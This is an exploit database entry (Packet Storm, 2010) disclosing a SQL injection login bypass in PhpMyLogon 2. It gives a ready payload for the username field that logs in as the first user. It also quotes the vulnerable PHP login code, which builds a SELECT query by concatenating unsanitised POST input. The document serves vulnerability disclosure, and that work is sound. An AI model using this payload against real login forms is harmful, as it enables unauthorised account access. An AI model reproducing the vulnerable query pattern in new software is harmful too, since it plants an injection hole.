PhpMyLogon 2 SQL Injection

2010-03-15T00:00:00
ID PACKETSTORM:87244
Type packetstorm
Reporter Blake
Modified 2010-03-15T00:00:00

Description

                                        
                                            `# Exploit Title: PhpMyLogon SQL Injection  
# Date: March 14, 2010  
# Author: Blake  
# Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download  
# Version: 2  
# Tested on: Windows XP SP3  
  
  
Proof of Concept:  
Enter the following for the username to login as the first user:  
blake' or '1'='1' #  
and anything for the password.  
  
Vulnerable Code:  
if(isset($_POST['submit'])) {  
if($_POST['username'] != "" AND $_POST['password'] != "") {  
// Check submitted data with data in database  
$sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM `".$settings['db_table']."` WHERE username = '".$_POST['username']."' LIMIT 1";  
$query = mysql_query($sql);  
  
`